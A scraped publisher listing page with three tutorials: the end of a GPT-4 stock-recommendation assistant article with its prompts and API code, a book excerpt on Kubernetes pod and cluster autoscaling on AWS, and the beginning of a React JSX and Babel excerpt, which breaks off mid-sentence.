our assistant is to analyze the provided news data dump and return the summary insights along with the recommendation as the output. However, to be able to give a recommendation, our assistant needs to know our risk appetite along with our portfolio condition. The following is an example of the system prompt that we can give to GPT4.system_prompt = “””You are an expert in giving recommendation to BUY / SELL / HOLD for {} ({}). You can only return in JSON format with 5 fields: "Investment Thesis" (dictionary of string. Consist of elaborated decision reasoning (in bullet points) based on the risk profile of the investor, unrealized profit, and all of the factors as the basis of your recommendation. Provide numbers to justify your assertions, a lot ideally. The deeper the analysis the better.), "Investor Profiling" (dictionary of string. Connect the investment thesis with each of the investor profiles, including risk profile and unrealized profit.) "Summary Thesis" (string. Summary of your all investment thesis as the basis of the given recommendation.  You have to take into account all factors in the investment thesis as well as the investor profiles.), "recommendation" ("BUY"/"SELL"/"HOLD") In the investment thesis, please cover the following factors. If a particular factor needed to write the investment thesis does not exist, don't try to make up the answer, just write "The information needed is unavailable". (1) Industry and Competitive Analysis: Assess the company's position within its industry and analyze industry trends, competition, barriers to entry, and market dynamics. (2) News and Events: Stay updated on relevant news, earnings announcements, product launches, regulatory changes, and other events that can impact the company or the overall market. (3) Market and Economic Conditions: Assess broader macroeconomic factors from news, including economic growth, interest rates, inflation, monetary and fiscal policies, geopolitical events, gold price, bond price, index price, real estate.”””And here’s an example of the user prompt that consists of all necessary data points. Risk profiles can be “Moderate”, “Aggresive”, or “Conservative”. user_prompt = “””<INVESTOR PROFILE> Risk Profile: {} Unrealized Profit: {}% {}”””Putting All TogetherNow, we just need to create the main function that will act as our personal AI investment assistant. def personal_investment_assistant(company_name:str, ticker:str, risk_profile: str,  unrealized_profit_perc: float):    news_data = []    for search_keyword in search_kwrds_lst:          news_data.extend(web_search(search_keyword))    news_data = "\n".join(news_data)            messages = [                        {                            "role": "system",                            "content": system_prompt.format(company_name,ticker)                        },                        {                            "role": "user",                            "content": user_prompt.format(risk_profile,unrealized_profit_perc,news_data)                }            ]    response = get_gpt_response("gpt-4",                                temperature = 0.0,                                messages = messages                                                )    return response["choices"][0]["message"]["content"].strip() import requests import json import os def get_gpt_response(model: str,temperature: float,messages: list): headers = {                       'content-type': "application/json",                       'Authorization': "Bearer " + os.environ["OPENAI_API_KEY"]                       } endpoint = 'https://api.openai.com/v1/chat/completions'           data = json.dumps({                                   "model": model, "messages": messages,                                   "temperature": temperature,                                   })             try: data = requests.post(endpoint, data=data, headers=headers)                       openai_response = json.loads(data.text)                       return openai_response           except Exception as e:                       print(e)                       return ""ConclusionCongratulations on keeping up to this point! Throughout this article, you have learned how to build your own personal AI investment analyst based on news data. You have learned how to get the news data, a list of useful search keywords, also the code implementation to build the AI assistant. Hope the best for your investment journey and see you in the next article!Author BioLouis Owen is a data scientist/AI engineer from Indonesia who is always hungry for new knowledge. Throughout his career journey, he has worked in various fields of industry, including NGOs, e-commerce, conversational AI, OTA, Smart City, and FinTech. Outside of work, he loves to spend his time helping data science enthusiasts to become data scientists, either through his articles or through mentoring sessions. He also loves to spend his spare time doing his hobbies: watching movies and conducting side projects. Currently, Louis is an NLP Research Engineer at Yellow.ai, the world’s leading CX automation platform. Check out Louis’ website to learn more about him! Lastly, if you have any queries or any topics to be discussed, please reach out to Louis via LinkedIn.
Read more
  • 0
  • 0
  • 40807
article-image-implementing-horizontal-pod-autoscaling-in-kubernetes-tutorial
Savia Lobo
18 Jul 2019
18 min read
Save for later

Implementing Horizontal Pod Autoscaling in Kubernetes [Tutorial]

Savia Lobo
18 Jul 2019
18 min read
When we use Kubernetes deployments to deploy our pod workloads, it is simple to scale the number of replicas used by our applications up and down using the kubectl scale command. However, if we want our applications to automatically respond to changes in their workloads and scale to meet demand, then Kubernetes provides us with Horizontal Pod Autoscaling. This article is an excerpt taken from the book Kubernetes on AWS written by Ed Robinson. In this book, you will start by learning about Kubernetes' powerful abstractions - Pods and Services - that make managing container deployments easy.  Horizontal Pod Autoscaling allows us to define rules that will scale the numbers of replicas up or down in our deployments based on CPU utilization and optionally other custom metrics. Before we are able to use Horizontal Pod Autoscaling in our cluster, we need to deploy the Kubernetes metrics server; this server provides endpoints that are used to discover CPU utilization and other metrics generated by our applications. In this article, you will learn how to use the horizontal pod autoscaling method to automatically scale your applications and to automatically provision and terminate EC2 instances. Deploying the metrics server Before we can make use of Horizontal Pod Autoscaling, we need to deploy the Kubernetes metrics server to our cluster. This is because the Horizontal Pod Autoscaling controller makes use of the metrics provided by the metrics.k8s.io API, which is provided by the metrics server. While some installations of Kubernetes may install this add-on by default, in our EKS cluster we will need to deploy it ourselves. There are a number of ways to deploy add-on components to your cluster: If you are using helm to manage applications on your cluster, you could use the stable/metrics server chart. For simplicity we are just going to deploy the metrics server manifests using kubectl. I like to integrate deploying add-ons such as the metrics server and kube2iam with the process that provisions the cluster, as I see them as integral parts of the cluster infrastructure. But if you are going to use a tool like a helm to manage deploying applications to your cluster, then you might prefer to manage everything running on your cluster with the same tool. The decision you take really depends on the processes you and your team adopt for managing your cluster and the applications that run on it. The metrics server is developed in the GitHub repository. You will find the manifests required to deploy it in the deploy directory of that repository. Start by cloning the configuration from GitHub. The metrics server began supporting the authentication methods provided by EKS in version 0.0.3 so make sure the manifests you have use at least that version. You will find a number of manifests in the deploy/1.8+ directory. The auth-reader.yaml and auth-delegator.yaml files configure the integration of the metrics server with the Kubernetes authorization infrastructure. The resource-reader.yaml file configures a role to give the metrics server the permissions to read resources from the API server, in order to discover the nodes that pods are running on. Basically, metrics-server-deployment.yaml and metrics-server-service.yaml define the deployment used to run the service itself and a service to be able to access it. Finally, the metrics-apiservice.yaml file defines an APIService resource that registers the metrics.k8s.io API group with the Kubernetes API server aggregation layer; this means that requests to the API server for the metrics.k8s.io group will be proxied to the metrics server service. Deploying these manifests with kubectl is simple, just submit all of the manifests to the cluster with kubectl apply: $ kubectl apply -f deploy/1.8+ You should see a message about each of the resources being created on the cluster. If you are using a tool like Terraform to provision your cluster, you might use it to submit the manifests for the metrics server when you create your cluster. Verifying the metrics server and troubleshooting Before we continue, we should take a moment to check that our cluster and the metrics server are correctly configured to work together. After the metrics server is running on your cluster and has had a chance to collect metrics from the cluster (give it a minute or so), you should be able to use the kubectl top command to see the resource usage of the pods and nodes in your cluster. Start by running kubectl top nodes. If you see output like this, then the metrics server is configured correctly and is collecting metrics from your nodes: $ kubectl top nodes NAME CPU(cores) CPU% MEMORY(bytes) MEMORY% ip-10-3-29-209 20m 1% 717Mi 19% ip-10-3-61-119 24m 1% 1011Mi 28% If you see an error message, then there are a number of troubleshooting steps you can follow. You should start by describing the metrics server deployment and checking that one replica is available: kubectl -n kube-system describe deployment metrics-server If it is not, you should debug the created pod by running kubectl -n kube-system describe pod. Look at the events to see why the server is not available. Make sure that you are running at least version 0.0.3 of the metrics server. If the metrics server is running correctly and you still see errors when running kubectl top, the issue is that the APIservice registered with the aggregation layer is not configured correctly. Check the events output at the bottom of the information returned when you run kubectl describe apiservice v1beta1.metrics.k8s.io. One common issue is that the EKS control plane cannot connect to the metrics server service on port 443. Autoscaling pods based on CPU usage Once the metrics server has been installed into our cluster, we will be able to use the metrics API to retrieve information about CPU and memory usage of the pods and nodes in our cluster. Using the kubectl top command is a simple example of this. The Horizontal Pod Autoscaler can also use this same metrics API to gather information about the current resource usage of the pods that make up a deployment. Let's look at an example of this; we are going to deploy a sample application that uses a lot of CPU under load, then configure a Horizontal Pod Autoscaler to scale up extra replicas of this pod to provide extra capacity when CPU utilization exceeds a target level. The application we will be deploying as an example is a simple Ruby web application that can calculate the nth number in the Fibonacci sequence, this application uses a simple recursive algorithm, and is not very efficient (perfect for us to experiment with autoscaling). The deployment for this application is very simple. It is important to set resource limits for CPU because the target CPU utilization is based on a percentage of this limit: deployment.yaml apiVersion: apps/v1 kind: Deployment metadata: name: fib labels: app: fib spec: selector: matchLabels: app: fib template: metadata: labels: app: fib spec: containers: - name: fib image: errm/fib ports: - containerPort: 9292 resources: limits: cpu: 250m memory: 32Mi We are not specifying a number of replicas in the deployment spec; when we first submit this deployment to the cluster, the number of replicas will therefore default to 1. This is good practice when creating a deployment where we intend the replicas to be adjusted by a Horizontal Pod Autoscaler, because it means that if we use kubectl apply to update the deployment later, we won't override the replica value the Horizonal Pod Autoscaler has set (inadvertently scaling the deployment down or up). Let's deploy this application to the cluster: kubectl apply -f deployment.yaml You could run kubectl get pods -l app=fib to check that the application started up correctly. We will create a service, so we are able to access the pods in our deployment, requests will be proxied to each of the replicas, spreading the load: service.yaml kind: Service apiVersion: v1 metadata: name: fib spec: selector: app: fib ports: - protocol: TCP port: 80 targetPort: 9292 Submit the service manifest to the cluster with kubectl: kubectl apply -f service.yaml We are going to configure a Horizonal Pod Autoscaler to control the number of replicas in our deployment. The spec defines how we want the autoscaler to behave; we have defined here that we want the autoscaler to maintain between 1 and 10 replicas of our application and achieve a target average CPU utilization of 60, across those replicas. When CPU utilization falls below 60%, then the autoscaler will adjust the replica count of the targeted deployment down; when it goes above 60%, replicas will be added: hpa.yaml kind: HorizontalPodAutoscaler apiVersion: autoscaling/v2beta1 metadata: name: fib spec: maxReplicas: 10 minReplicas: 1 scaleTargetRef: apiVersion: app/v1 kind: Deployment name: fib metrics: - type: Resource resource: name: cpu targetAverageUtilization: 60 Create the autoscaler with kubectl: kubectl apply -f hpa.yaml The kubectl autoscale command is a shortcut to create a HorizontalPodAutoscaler. Running kubectl autoscale deployment fib --min=1 --max=10 --cpu-percent=60 would create an equivalent autoscaler. Once you have created the Horizontal Pod Autoscaler, you can see a lot of interesting information about its current state with kubectl describe: $ kubectl describe hpa fib Name: fib Namespace: default CreationTimestamp: Sat, 15 Sep 2018 14:32:46 +0100 Reference: Deployment/fib Metrics: ( current / target ) resource cpu: 0% (1m) / 60% Min replicas: 1 Max replicas: 10 Deployment pods: 1 current / 1 desired Now we have set up our Horizontal Pod Autoscaler, we should generate some load on the pods in our deployment to illustrate how it works. In this case, we are going to use the ab (Apache benchmark) tool to repeatedly ask our application to compute the thirtieth Fibonacci number: load.yaml apiVersion: batch/v1 kind: Job metadata: name: fib-load labels: app: fib component: load spec: template: spec: containers: - name: fib-load image: errm/ab args: ["-n1000", "-c4", "fib/30"] restartPolicy: OnFailure This job uses ab to make 1,000 requests to the endpoint (with a concurrency of 4). Submit the job to the cluster, then observe the state of the Horizontal Pod Autoscaler: kubectl apply -f load.yaml watch kubectl describe hpa fib Once the load job has started to make requests, the autoscaler will scale up the deployment in order to handle the load: Name: fib Namespace: default CreationTimestamp: Sat, 15 Sep 2018 14:32:46 +0100 Reference: Deployment/fib Metrics: ( current / target ) resource cpu: 100% (251m) / 60% Min replicas: 1 Max replicas: 10 Deployment pods: 2 current / 2 desired Autoscaling pods based on other metrics The metrics server provides APIs that the Horizontal Pod Autoscaler can use to gain information about the CPU and memory utilization of pods in the cluster. It is possible to target a utilization percentage like we did for the CPU metric, or to target the absolute value as we have here for the memory metric: hpa.yaml kind: HorizontalPodAutoscaler apiVersion: autoscaling/v2beta1 metadata: name: fib spec: maxReplicas: 10 minReplicas: 1 scaleTargetRef: apiVersion: app/v1 kind: Deployment name: fib metrics: - type: Resource resource: name: memory targetAverageValue: 20M The Horizonal Pod Autoscaler also allows us to scale on other metrics provided by more comprehensive metrics systems. Kubernetes allows for metrics APIs to be aggregated for custom and external metrics. Custom metrics are metrics other than CPU and memory that are associated with a pod. You might for example use an adapter that allows you to use metrics that a system like Prometheus has collected from your pods. This can be very beneficial if you have more detailed metrics available about the utilization of your application, for example, a forking web server that exposes a count of busy worker processes, or a queue processing application that exposes metrics about the number of items currently enqueued. External metrics adapters provide information about resources that are not associated with any object within Kubernetes, for example, if you were using an external queuing system, such as the AWS SQS service.   On the whole, it is simpler if your applications can expose metrics about resources that they depend on that use an external metrics adapter, as it can be hard to limit access to particular metrics, whereas custom metrics are tied to a particular Pod, so Kubernetes can limit access to only those users and processes that need to use them. Autoscaling the cluster The capabilities of Kubernetes Horizontal Pod Autoscaler allow us to add and remove pod replicas from our applications as their resource usage changes over time. However, this makes no difference to the capacity of our cluster. If our pod autoscaler is adding pods to handle an increase in load, then eventually we might run out of space in our cluster, and additional pods would fail to be scheduled. If there is a decrease in the load on our application and the pod autoscaler removes pods, then we are paying AWS for EC2 instances that will sit idle. When we created our cluster in Chapter 7, A Production-Ready Cluster, we deployed the cluster nodes using an autoscaling group, so we should be able to use this to grow and shrink the cluster as the needs of the applications deployed to it change over time. Autoscaling groups have built-in support for scaling the size of the cluster, based on the average CPU utilization of the instances. This, however, is not really suitable when dealing with a Kubernetes cluster because the workloads running on each node of our cluster might be quite different, so the average CPU utilization is not really a very good proxy for the free capacity of the cluster. Thankfully, in order to schedule pods to nodes effectively, Kubernetes keeps track of the capacity of each node and the resources requested by each pod. By utilizing this information, we can automate scaling the cluster to match the size of the workload. The Kubernetes autoscaler project provides a cluster autoscaler component for some of the main cloud providers, including AWS. The cluster autoscaler can be deployed to our cluster quite simply. As well as being able to add instances to our cluster, the cluster autoscaler is also able to drain the pods from and then terminate instances when the capacity of the cluster can be reduced.   Deploying the cluster autoscaler Deploying the cluster autoscaler to our cluster is quite simple as it just requires a simple pod to be running. All we need for this is a simple Kubernetes deployment. In order for the cluster autoscaler to update the desired capacity of our autoscaling group, we need to give it permissions via an IAM role. If you are using kube2iam, we will be able to specify this role for the cluster autoscaler pod via an appropriate annotation: cluster_autoscaler.tf data "aws_iam_policy_document" "eks_node_assume_role_policy" { statement { actions = ["sts:AssumeRole"] principals { type = "AWS" identifiers = ["${aws_iam_role.node.arn}"] } } } resource "aws_iam_role" "cluster-autoscaler" { name = "EKSClusterAutoscaler" assume_role_policy = "${data.aws_iam_policy_document.eks_node_assume_role_policy.json}" } data "aws_iam_policy_document" "autoscaler" { statement { actions = [ "autoscaling:DescribeAutoScalingGroups", "autoscaling:DescribeAutoScalingInstances", "autoscaling:DescribeTags", "autoscaling:SetDesiredCapacity", "autoscaling:TerminateInstanceInAutoScalingGroup" ] resources = ["*"] } } resource "aws_iam_role_policy" "cluster_autoscaler" { name = "cluster-autoscaler" role = "${aws_iam_role.cluster_autoscaler.id}" policy = "${data.aws_iam_policy_document.autoscaler.json}" }   In order to deploy the cluster autoscaler to our cluster, we will submit a deployment manifest using kubectl. We will use Terraform's templating system to produce the manifest. We create a service account that is used by the autoscaler to connect to the Kubernetes API: cluster_autoscaler.tpl --- apiVersion: v1 kind: ServiceAccount metadata: labels: k8s-addon: cluster-autoscaler.addons.k8s.io k8s-app: cluster-autoscaler name: cluster-autoscaler namespace: kube-system The cluster autoscaler needs to read information about the current resource usage of the cluster, and needs to be able to evict pods from nodes that need to be removed from the cluster and terminated. Basically, cluster-autoscalerClusterRole provides the required permissions for these actions. The following is the code continuation for cluster_autoscaler.tpl: --- apiVersion: rbac.authorization.k8s.io/v1beta1 kind: ClusterRole metadata: name: cluster-autoscaler labels: k8s-addon: cluster-autoscaler.addons.k8s.io k8s-app: cluster-autoscaler rules: - apiGroups: [""] resources: ["events","endpoints"] verbs: ["create", "patch"] - apiGroups: [""] resources: ["pods/eviction"] verbs: ["create"] - apiGroups: [""] resources: ["pods/status"] verbs: ["update"] - apiGroups: [""] resources: ["endpoints"] resourceNames: ["cluster-autoscaler"] verbs: ["get","update"] - apiGroups: [""] resources: ["nodes"] verbs: ["watch","list","get","update"] - apiGroups: [""] resources: ["pods","services","replicationcontrollers","persistentvolumeclaims","persistentvolumes"] verbs: ["watch","list","get"] - apiGroups: ["extensions"] resources: ["replicasets","daemonsets"] verbs: ["watch","list","get"] - apiGroups: ["policy"] resources: ["poddisruptionbudgets"] verbs: ["watch","list"] - apiGroups: ["apps"] resources: ["statefulsets"] verbs: ["watch","list","get"] - apiGroups: ["storage.k8s.io"] resources: ["storageclasses"] verbs: ["watch","list","get"] --- apiVersion: rbac.authorization.k8s.io/v1beta1 kind: ClusterRoleBinding metadata: name: cluster-autoscaler labels: k8s-addon: cluster-autoscaler.addons.k8s.io k8s-app: cluster-autoscaler roleRef: apiGroup: rbac.authorization.k8s.io kind: ClusterRole name: cluster-autoscaler subjects: - kind: ServiceAccount name: cluster-autoscaler namespace: kube-system Note that cluster-autoscaler stores state information in a config map, so needs permissions to be able to read and write from it. This role allows that. The following is the code continuation for cluster_autoscaler.tpl: --- apiVersion: rbac.authorization.k8s.io/v1beta1 kind: Role metadata: name: cluster-autoscaler namespace: kube-system labels: k8s-addon: cluster-autoscaler.addons.k8s.io k8s-app: cluster-autoscaler rules: - apiGroups: [""] resources: ["configmaps"] verbs: ["create"] - apiGroups: [""] resources: ["configmaps"] resourceNames: ["cluster-autoscaler-status"] verbs: ["delete","get","update"] --- apiVersion: rbac.authorization.k8s.io/v1beta1 kind: RoleBinding metadata: name: cluster-autoscaler namespace: kube-system labels: k8s-addon: cluster-autoscaler.addons.k8s.io k8s-app: cluster-autoscaler roleRef: apiGroup: rbac.authorization.k8s.io kind: Role name: cluster-autoscaler subjects: - kind: ServiceAccount name: cluster-autoscaler namespace: kube-system Finally, let's consider the manifest for the cluster autoscaler deployment itself. The cluster autoscaler pod contains a single container running the cluster autoscaler control loop. You will notice that we are passing some configuration to the cluster autoscaler as command-line arguments. Most importantly, the --node-group-auto-discovery flag allows the autoscaler to operate on autoscaling groups with the kubernetes.io/cluster/<cluster_name> tag. This is convenient because we don't have to explicitly configure the autoscaler with our cluster autoscaling group. If your Kubernetes cluster has nodes in more than one availability zone and you are running pods that rely on being scheduled to a particular zone (for example, pods that are making use of EBS volumes), it is recommended to create an autoscaling group for each availability zone that you plan to use. If you use one autoscaling group that spans several zones, then the cluster autoscaler will be unable to specify the availability zone of the instances that it launches. Here is the code continuation for cluster_autoscaler.tpl: --- apiVersion: extensions/v1beta1 kind: Deployment metadata: name: cluster-autoscaler namespace: kube-system labels: app: cluster-autoscaler spec: replicas: 1 selector: matchLabels: app: cluster-autoscaler template: metadata: annotations: iam.amazonaws.com/role: ${iam_role} labels: app: cluster-autoscaler spec: serviceAccountName: cluster-autoscaler containers: - image: k8s.gcr.io/cluster-autoscaler:v1.3.3 name: cluster-autoscaler resources: limits: cpu: 100m memory: 300Mi requests: cpu: 100m memory: 300Mi command: - ./cluster-autoscaler - --v=4 - --stderrthreshold=info - --cloud-provider=aws - --skip-nodes-with-local-storage=false - --expander=least-waste - --node-group-auto-discovery=asg:tag=kubernetes.io/cluster/${cluster_name} env: - name: AWS_REGION value: ${aws_region} volumeMounts: - name: ssl-certs mountPath: /etc/ssl/certs/ca-certificates.crt readOnly: true imagePullPolicy: "Always" volumes: - name: ssl-certs hostPath: path: "/etc/ssl/certs/ca-certificates.crt" Finally, we render the templated manifest by passing in the variables for the AWS region, cluster name and IAM role, and submitting the file to Kubernetes using kubectl: Here is the code continuation for cluster_autoscaler.tpl: data "aws_region" "current" {} data "template_file" " cluster_autoscaler " { template = "${file("${path.module}/cluster_autoscaler.tpl")}" vars { aws_region = "${data.aws_region.current.name}" cluster_name = "${aws_eks_cluster.control_plane.name}" iam_role = "${aws_iam_role.cluster_autoscaler.name}" } } resource "null_resource" "cluster_autoscaler" { trigers = { manifest_sha1 = "${sha1("${data.template_file.cluster_autoscaler.rendered}")}" } provisioner "local-exec" { command = "kubectl --kubeconfig=${local_file.kubeconfig.filename} apply -f -<<EOF\n${data.template_file.cluster_autoscaler.rendered}\nEOF" } } Thus, by understanding how Kubernetes assigns Quality of Service classes to your pods based on the resource requests and limits that you assign them, you can have precisely control how your pods are managed. By ensuring your critical applications, such as web servers and databases, run with the Guaranteed class, you can ensure that they will perform consistently and suffer minimal disruption when pods need to be rescheduled. If you have enjoyed reading this post, head over to our book, Kubernetes on AWS, for tips on deploying and managing applications, keeping your cluster and applications secure, and ensuring that your whole system is reliable and resilient to failure Low Carbon Kubernetes Scheduler: A demand side management solution that consumes electricity in low grid carbon intensity areas A vulnerability discovered in Kubernetes kubectl cp command can allow malicious directory traversal attack on a targeted system Kubernetes 1.15 releases with extensibility around core Kubernetes APIs, cluster lifecycle stability, and more!
Read more
  • 0
  • 0
  • 40774

article-image-clean-your-code
Packt
19 Dec 2016
23 min read
Save for later

Clean Up Your Code

Packt
19 Dec 2016
23 min read
 In this article by Michele Bertoli, the author of the book React Design Patterns and Best Practices, we will learn to use JSX without any problems or unexpected behaviors, it is important to understand how it works under the hood and the reasons why it is a useful tool to build UIs. Our goal is to write clean and maintainable JSX code and to achieve that we have to know where it comes from, how it gets translated to JavaScript and which features it provides. In the first section, we will do a little step back but please bear with me because it is crucial to master the basics to apply the best practices. In this article, we will see: What is JSX and why we should use it What is Babel and how we can use it to write modern JavaScript code The main features of JSX and the differences between HTML and JSX The best practices to write JSX in an elegant and maintainable way (For more resources related to this topic, see here.) JSX Let's see how we can declare our elements inside our components. React gives us two ways to define our elements: the first one is by using JavaScript functions and the second one is by using JSX, an optional XML-like syntax. In the beginning, JSX is one of the main reasons why people fails to approach to React because looking at the examples on the homepage and seeing JavaScript mixed with HTML for the first time does not seem right to most of us. As soon as we get used to it, we realize that it is very convenient exactly because it is similar to HTML and it looks very familiar to anyone who already created User Interfaces on the web. The opening and closing tags, make it easier to represent nested trees of elements, something that would have been unreadable and hard to maintain using plain JavaScript. Babel In order to use JSX (and es2015) in our code, we have to install Babel. First of all, it is important to understand clearly the problems it can solve for us and why we need to add a step in our process. The reason is that we want to use features of the language that have not been implemented yet in the browser, our target environment. Those advanced features make our code more clean for the developers but the browser cannot understand and execute it. So the solution is to write our scripts in JSX and es2015 and when we are ready to ship, we compile the sources into es5, the standard specification that is implemented in the major browsers today. Babel is a popular JavaScript compiler widely adopted within the React community: It can compile es2015 code into es5 JavaScript as well as compile JSX into JavaScript functions. The process is called transpilation, because it compiles the source into a new source rather than into an executable. Using it is pretty straightforward, we just install it: npm install --global babel-cli If you do not like to install it globally (developers usually tend to avoid it), you can install Babel locally to a project and run it through a npm script but for the purpose of this article a global instance is fine. When the installation is completed we can run the following command to compile our JavaScript files: babel source.js -o output.js One of the reasons why Babel is so powerful is because it is highly configurable. Babel is just a tool to transpile a source file into an output file but to apply some transformations we need to configure it. Luckily, there are some very useful presets of configurations which we can easily install and use: npm install --global babel-preset-es2015 babel-preset-react Once the installation is done, we create a configuration file called .babelrc and put the following lines into it to tell Babel to use those presets: { "presets": [ "es2015", "React" ] } From this point on we can write es2015 and JSX in our source files and execute the output files in the browser. Hello, World! Now that our environment has been set up to support JSX, we can dive into the most basic example: generating a div element. This is how you would create a div with React'screateElementfunction: React.createElement('div') React has some shortcut methods for DOM elements and the following line is equivalent to the one above: React.DOM.div() This is the JSX for creating a div element: <div /> It looks identical to the way we always used to create the markup of our HTML pages. The big difference is that we are writing the markup inside a .js file but it is important to notice that JSX is only a syntactic sugar and it gets transpiled into the JavaScript before being executed in the browser. In fact, our <div /> is translated into React.createElement('div') when we run Babel and that is something we should always keep in mind when we write our templates. DOM elements and React components With JSX we can obviously create both HTML elements and React components, the only difference is if they start with a capital letter or not. So for example to render an HTML button we use <button />, while to render our Button components we use <Button />. The first button gets transpiled into: React.createElement('button') While the second one into: React.createElement(Button) The difference here is that in the first call we are passing the type of the DOM element as a string while in the second one we are passing the component itself, which means that it should exist in the scope to work. As you may have noticed, JSX supports self-closing tags which are pretty good to keep the code terse and they do not require us to repeat unnecessary tags. Props JSX is very convenient when your DOM elements or React components have props, in fact following XML is pretty easy to set attributes on elements: <imgsrc="https://facebook.github.io/react/img/logo.svg" alt="React.js" /> The equivalent in JavaScript would be: React.createElement("img", { src: "https://facebook.github.io/react/img/logo.svg", alt: "React.js" }); Which is way less readable and even with only a couple of attributes it starts getting hard to be read without a bit of reasoning. Children JSX allows you to define children to describe the tree of elements and compose complex UIs. A basic example could be a link with a text inside it: <a href="https://facebook.github.io/react/">Click me!</a> Which would be transpiled into: React.createElement( "a", { href: "https://facebook.github.io/react/" }, "Click me!" ); Our link can be enclosed inside a div for some layout requirements and the JSX snippet to achieve that is the following: <div> <a href="https://facebook.github.io/react/">Click me!</a> </div> With the JSX equivalent being: React.createElement( "div", null, React.createElement( "a", { href: "https://facebook.github.io/react/" }, "Click me!" ) ); It becomes now clear how the XML-like syntax of JSX makes everything more readable and maintainable but it is always important to know what is the JavaScript parallel of our JSX to take control over the creation of elements. The good part is that we are not limited to have elements as children of elements but we can use JavaScript expressions like functions or variables. For doing that we just have to put the expression inside curly braces: <div> Hello, {variable}. I'm a {function()}. </div> The same applies to non-string attributes: <a href={this.makeHref()}>Click me!</a> Differences with HTML So far we have seen how the JSX is similar to HTML, let's now see the little differences between them and the reasons why they exist. Attributes We always have to keep in mind that JSX is not a standard language and it gets transpiled into JavaScript and because of that, some attributes cannot be used. For example instead of class we have to use className and instead of for we have to use htmlFor: <label className="awesome-label"htmlFor="name" /> The reason is that class and for are reserved word in JavaScript. Style A pretty significant difference is the way the style attribute works.The style attribute does not accept a CSS string as the HTML parallel does, but it expects a JS Object where the style names are camelCased. <div style={{ backgroundColor: 'red' }} /> Root One important difference with HTML worth mentioning is that since JSX elements get translated into JavaScript functions and you cannot return two functions in JavaScript, whenever you have multiple elements at the same level you are forced to wrap them into a parent. Let's see a simple example: <div /> <div /> Gives us the following error: Adjacent JSX elements must be wrapped in an enclosing tag While this: <div> <div /> <div /> </div> It is pretty annoying having to add unnecessary divtags just for making JSX work but the React developers are trying to find a solution: https://github.com/reactjs/core-notes/blob/master/2016-07/july-07.md Spaces There's one thing that could be a little bit tricky at the beginning and again it regards the fact that we should always have in mind that JSX is not HTML, even if it has an XML-like syntax. JSX, in fact, handles the spaces between text and elements differently from HTML in a way that's counter-intuitive. Consider the following snippet: <div> <span>foo</span> bar <span>baz</span> </div> In the browser, which interprets HTML, this code would give you foo bar baz, which is exactly what we expect it to be. In JSX instead, the same code would be rendered as foobarbaz and that is because the three nested lines get transpiled as individual children of the div element, without taking in account the spaces. A common solution is to put a space explicitly between the elements: <div> <span>foo</span> {''} bar {''} <span>baz</span> </div> As you may have noticed, we are using an empty string wrapped inside a JavaScript expression to force the compiler to apply the space between the elements. Boolean Attributes A couple of more things worth mentioning before starting for real regard the way you define Boolean attributes in JSX. If you set an attribute without a value, JSX assumes that its value is true, following the same behavior of the HTML disabled attribute, for example. That means that if we want to set an attribute to false we have to declare it explicitly to false: <button disabled /> React.createElement("button", { disabled: true }); And: <button disabled={false} /> React.createElement("button", { disabled: false }); This can be confusing in the beginning because we may think that omitting an attribute would mean false but it is not like that: with React we should always be explicit to avoid confusion. Spread attributes An important feature is the spread attributes operator, which comes from the Rest/Spread Properties for ECMAScript proposal and it is very convenient whenever we want to pass all the attributes of a JavaScript object to an element. A common practice that leads to fewer bugs is not to pass entire JavaScript objects down to children by reference but using their primitive values which can be easily validated making components more robust and error proof. Let's see how it works: const foo = { bar: 'baz' } return <div {...foo} /> That gets transpiled into this: var foo = { bar: 'baz' }; return React.createElement('div', foo); JavaScript templating Last but not least, we started from the point that one of the advantages of moving the templates inside our components instead of using an external template library is that we can use the full power of JavaScript, so let's start looking at what it means. The spread attributes is obviously an example of that and another common one is that JavaScript expressions can be used as attributes values by wrapping them into curly braces: <button disabled={errors.length} /> Now that we know how JSX works and we master it, we are ready to see how to use it in the right way following some useful conventions and techniques. Common Patterns Multi-line Let's start with a very simple one: as we said, on the main reasons why we should prefer JSX over React'screateClass is because of its XML-like syntax and the way balanced opening/closing tags are perfect to represent a tree of nodes. Therefore, we should try to use it in the right way and get the most out of it. One example is that, whenever we have nested elements, we should always go multi-line: <div> <Header /> <div> <Main content={...} /> </div> </div> Instead of: <div><Header /><div><Main content={...} /></div></div> Unless the children are not elements, such as text or variables. In that case it can make sense to remain on the same line and avoid adding noise to the markup, like: <div> <Alert>{message}</Alert> <Button>Close</Button> </div> Always remember to wrap your elements inside parenthesis when you write them in multiple lines. In fact, JSX always gets replaced by functions and functions written in a new line can give you an unexpected result. Suppose for example that you are returning JSX from your render method, which is how you create UIs in React. The following example works fine because the div is in the same line of the return: return <div /> While this is not right: return <div /> Because you would have: return; React.createElement("div", null); That is why you have to wrap the statement into parenthesis: return ( <div /> ) Multi-properties A common problem in writing JSX comes when an element has multiples attributes. One solution would be to write all the attributes on the same line but this would lead to very long lines which we do not want in our code (see in the next section how to enforce coding style guides). A common solution is to write each attribute on a new line with one level of indentation and then putting the closing bracket aligned with the opening tag: <button foo="bar" veryLongPropertyName="baz" onSomething={this.handleSomething} /> Conditionals Things get more interesting when we start working with conditionals, for example if we want to render some components only when some conditions are matched. The fact that we can use JavaScript is obviously a plus but there are many different ways to express conditions in JSX and it is important to understand the benefits and the problems of each one of those to write code that is readable and maintainable at the same time. Suppose we want to show a logout button only if the user is currently logged in into our application. A simple snippet to start with is the following: let button if (isLoggedIn) { button = <LogoutButton /> } return <div>{button}</div> It works but it is not very readable, especially if there are multiple components and multiple conditions. What we can do in JSX is using an inline condition: <div> {isLoggedIn&&<LoginButton />} </div> This works because if the condition is false, nothing gets rendered but if the condition is true the createElement function of the Loginbutton gets called and the element is returned to compose the resulting tree. If the condition has an alternative, the classic if…else statement, and we want for example to show a logout button if the user is logged in and a login button otherwise, we can either use JavaScript's if…else: let button if (isLoggedIn) { button = <LogoutButton /> } else { button = <LoginButton /> } return <div>{button}</div> Alternatively, better, using a ternary condition, which makes our code more compact: <div> {isLoggedIn ? <LogoutButton /> : <LoginButton />} </div> You can find the ternary condition used in popular repositories like the Redux real world example (https://github.com/reactjs/redux/blob/master/examples/real-world/src/components/List.js) where the ternary is used to show a loading label if the component is fetching the data or "load more" inside a button according to the value of the isFetching variable: <button [...]> {isFetching ? 'Loading...' : 'Load More'} </button> Let's now see what is the best solution when things get more complicated and, for example, we have to check more than one variable to determine if render a component or not: <div> {dataIsReady&& (isAdmin || userHasPermissions) &&<SecretData />} </div> In this case is clear that using the inline condition is a good solution but the readability is strongly impacted so what we can do instead is creating a helper function inside our component and use it in JSX to 